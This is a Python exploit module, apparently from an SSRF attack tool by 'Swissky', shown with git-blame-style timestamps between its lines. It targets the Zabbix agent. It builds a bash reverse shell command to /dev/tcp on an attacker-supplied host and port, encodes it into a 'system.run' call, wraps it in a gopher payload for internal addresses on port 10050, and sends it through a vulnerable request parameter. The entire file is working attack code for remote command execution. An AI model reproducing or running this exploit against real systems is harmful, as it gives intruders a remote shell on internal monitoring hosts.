2018-10-16 19:34:04 +00:00
|
|
|
from core.utils import *
|
|
|
|
|
import logging
|
|
|
|
|
import urllib.parse as urllib
|
|
|
|
|
|
2018-10-18 11:37:28 +00:00
|
|
|
# NOTE
|
2018-10-16 19:53:25 +00:00
|
|
|
# Require `EnableRemoteCommands = 1` on the Zabbix service
|
|
|
|
|
|
2018-10-16 22:54:13 +00:00
|
|
|
name = "zabbix"
|
|
|
|
|
description = "Zabbix RCE"
|
|
|
|
|
author = "Swissky"
|
|
|
|
|
documentation = []
|
|
|
|
|
|
2018-10-16 19:34:04 +00:00
|
|
|
class exploit():
|
2018-10-16 19:53:25 +00:00
|
|
|
cmd = "bash -i >& /dev/tcp/SERVER_HOST/SERVER_PORT 0>&1"
|
2018-10-16 19:34:04 +00:00
|
|
|
|
|
|
|
|
def __init__(self, requester, args):
|
|
|
|
|
logging.info("Module '{}' launched !".format(name))
|
|
|
|
|
|
2018-10-16 19:53:25 +00:00
|
|
|
cmd = input("Give command to execute (Enter for Reverse Shell): ")
|
|
|
|
|
if cmd == "":
|
|
|
|
|
if args.lhost == None:
|
|
|
|
|
self.cmd = self.cmd.replace("SERVER_HOST", input("Server Host:"))
|
|
|
|
|
else:
|
|
|
|
|
self.cmd = self.cmd.replace("SERVER_HOST", args.lhost)
|
|
|
|
|
|
|
|
|
|
if args.lport == None:
|
|
|
|
|
self.cmd = self.cmd.replace("SERVER_PORT", input("Server Port:"))
|
|
|
|
|
else:
|
|
|
|
|
self.cmd = self.cmd.replace("SERVER_PORT", args.lport)
|
|
|
|
|
else:
|
|
|
|
|
self.cmd = cmd
|
|
|
|
|
|
2018-10-16 19:34:04 +00:00
|
|
|
# Data for the service
|
2018-10-17 12:16:51 +00:00
|
|
|
gen_host = gen_ip_list("127.0.0.1", args.level)
|
|
|
|
|
for ip in gen_host:
|
|
|
|
|
port = "10050"
|
|
|
|
|
self.cmd = urllib.quote_plus(self.cmd).replace("+","%20")
|
|
|
|
|
self.cmd = self.cmd.replace("%2F","/")
|
|
|
|
|
self.cmd = self.cmd.replace("%25","%")
|
|
|
|
|
self.cmd = self.cmd.replace("%3A",":")
|
|
|
|
|
data = "system.run[(" + self.cmd + ");sleep 2s]"
|
|
|
|
|
|
|
|
|
|
payload = wrapper_gopher(data, ip , port)
|
|
|
|
|
logging.info("Generated payload : {}".format(payload))
|
|
|
|
|
|
|
|
|
|
# Send the payload
|
|
|
|
|
r = requester.do_request(args.param, payload)
|
